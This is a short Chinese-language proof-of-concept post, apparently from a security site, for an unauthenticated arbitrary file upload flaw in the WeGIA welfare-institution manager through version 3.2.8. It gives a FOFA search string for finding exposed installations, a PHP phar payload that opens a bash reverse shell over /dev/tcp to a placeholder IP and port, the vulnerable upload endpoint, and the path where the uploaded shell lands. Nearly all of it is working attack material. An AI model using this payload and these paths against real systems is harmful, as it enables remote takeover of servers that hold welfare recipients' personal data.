WeGIA存在前台任意文件上传漏洞
WeGIA是一个福利机构管理器,并且具有一下几种功能,并且在3.2.8及之前版本都存在前台任意文件上传漏洞,且都可进行直接上传Phar等文件执行任意命令,反弹Shell等操作。
fofa
"./assets/vendor/select2/select2.js"
poc
phar内容
<?php
$ip = 'IP';
$port = 4444;
system("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");
?>
将phar文件上传
/WeGIA/html/socio/sistema/controller/controla_xlsx.php
上传后,文件在 /WeGIA/html/socio/sistema/tabelas/shell.phar
漏洞来源
闽公网安备35020302035932号